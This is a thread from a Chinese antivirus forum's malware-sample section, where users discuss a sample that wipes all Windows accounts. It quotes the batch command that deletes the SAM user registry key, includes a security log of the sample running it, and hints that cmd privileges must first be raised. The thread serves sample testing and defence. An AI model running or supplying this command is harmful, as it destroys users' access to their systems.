楼主: 深山红叶__
收起左侧

[病毒样本] 删除所有账户(包括内置账户)

  [复制链接]
深山红叶__
 楼主| 发表于 2014-6-7 11:52:54 | 显示全部楼层
本帖最后由 深山红叶__ 于 2014-6-7 11:55 编辑
vm001 发表于 2014-6-7 09:13
@echo off
cmd /k reg delete HKLM\SAM\SAM\Domains\Account\Users /f

在这之前还有关键的一步
hddu 发表于 2014-6-7 11:36:39
2014-06-07 11:33:38    创建文件      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Test\KaFan Test.bat
触发规则:所有程序规则->Documents and Settings设置(二)->?:\Documents and Settings\*\桌面\*


2014-06-07 11:33:39    运行应用程序      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c "KaFan Test.bat"
触发规则:所有程序规则->系统程序设置->%windir%\system32\cmd.exe


2014-06-07 11:33:40    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/k reg delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2014-06-07 11:33:40    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:所有程序规则->系统程序设置->*\reg.exe


2014-06-07 11:33:47    关闭/重启系统      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe

触发规则:所有程序规则->*

在这之前还有关键的一步否则REG不起作用
深山红叶__
 楼主| 发表于 2014-6-7 11:57:47 | 显示全部楼层
Qutianshang 发表于 2014-6-7 10:43
重启出现12天过期??

重启还能进桌面?!
请提供系统信息
Qutianshang
发表于 2014-6-7 12:04:49 | 显示全部楼层
深山红叶__ 发表于 2014-6-7 11:57
重启还能进桌面?!
请提供系统信息

很正常啊。xp32
深山红叶__
 楼主| 发表于 2014-6-7 12:08:20 | 显示全部楼层

按理来说重启后所有账户就都没了,同XP32bit debug成功,可能没考虑好兼容,楼主再运行试试?
深山红叶__
 楼主| 发表于 2014-6-7 12:09:30 | 显示全部楼层
柯林 发表于 2014-6-7 11:43
直接挂掉(图又被限制上传了)

原来是禁运党
Qutianshang
发表于 2014-6-7 12:12:01 | 显示全部楼层
深山红叶__ 发表于 2014-6-7 12:08
按理来说重启后所有账户就都没了,同XP32bit debug成功,可能没考虑好兼容,楼主再运行试试?

我刚试了一下,确实没有账户了。之前测试我使用的是xpsp2,在哪里拦截了
深山红叶__
 楼主| 发表于 2014-6-7 12:13:49 | 显示全部楼层
Qutianshang 发表于 2014-6-7 12:12
我刚试了一下,确实没有账户了。之前测试我使用的是xpsp2,在哪里拦截了

不清楚,不知道是不是sp2缺功能之类的...
现在欢迎登陆界面是不是什么都没有?
JokerJ
头像被屏蔽
发表于 2014-6-7 12:17:13 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
vm001
发表于 2014-6-7 12:20:27 | 显示全部楼层
深山红叶__ 发表于 2014-6-7 11:52
在这之前还有关键的一步

在这之前还有关键的一步否则REG不起作用

给cmd提权
深山红叶__
 楼主| 发表于 2014-6-7 12:20:49 | 显示全部楼层
JokerJ 发表于 2014-6-7 12:17
你妈逼害得老子重装系统 不得好死
最好虚拟机运行,实机运行请套个影子什么的

请自己看帖
版区说明:
安全警告:本区的附件都有可能具有威胁您的计算机安全的可能,并且没有任何安全软件能够100%保证防护住这些样本,请勿实机测试这些样本哦~


无脑喷是没有用的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-18 10:27 , Processed in 0.087902 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表